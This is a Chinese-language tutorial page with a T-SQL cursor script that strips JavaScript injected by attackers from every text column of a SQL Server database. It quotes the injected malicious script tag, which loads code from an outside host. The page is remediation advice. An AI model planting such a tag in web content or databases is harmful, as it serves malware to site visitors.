您当前位置：首页 > 数据库 > Sqlserver > 清除数据库被注入的所有js代码

清除数据库被注入的所有js代码

来源：程序员人生发布时间：2014-02-04 01:45:19 阅读次数：3833次

　　网(LieHuo.Net)教程近日不少站长在论坛反映自己的网站有被挂马，小编分析了一下帖子，大多数站长的挂马形式都是JS代码注入，如何清除大量的代码呢？请看下面的解决方法。

　　首先，替换代码里面的<script src=http://r01.3322.org/c.js></script>为你的数据库表里面被注入的内容，打开MSSQL的SQL查询分析器执行以下代码就可以了。

以下为引用的内容：

declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for select a.name,b.name
from sysobjects a,syscolumns b ,systypes c
where a.id=b.id and a.xtype='u' and c.name
in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext')
declare @str varchar(500),@str2 varchar(500)
set @str='<script src=http://r01.3322.org/c.js></script>'/*网提醒，红色部分为要替换的内容*/
set @str2=''
open table_cursor
fetch next from table_cursor
into @t,@c while(@@fetch_status=0)
begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''+ @str2 +''')')

fetch next from table_cursor
into @t,@c end close table_cursor deallocate table_cursor;

生活不易，码农辛苦
如果您觉得本网站对您的学习有所帮助,可以手机扫描二维码进行捐赠
程序员人生

------分隔线----------------------------

上一篇 通过多年网站优化总结出的29条经验

下一篇 Ubuntu server 上建立 nfs 服务器的步骤

分享到:

------分隔线----------------------------

为码而活

积分：4237

15粉丝

7关注

栏目热点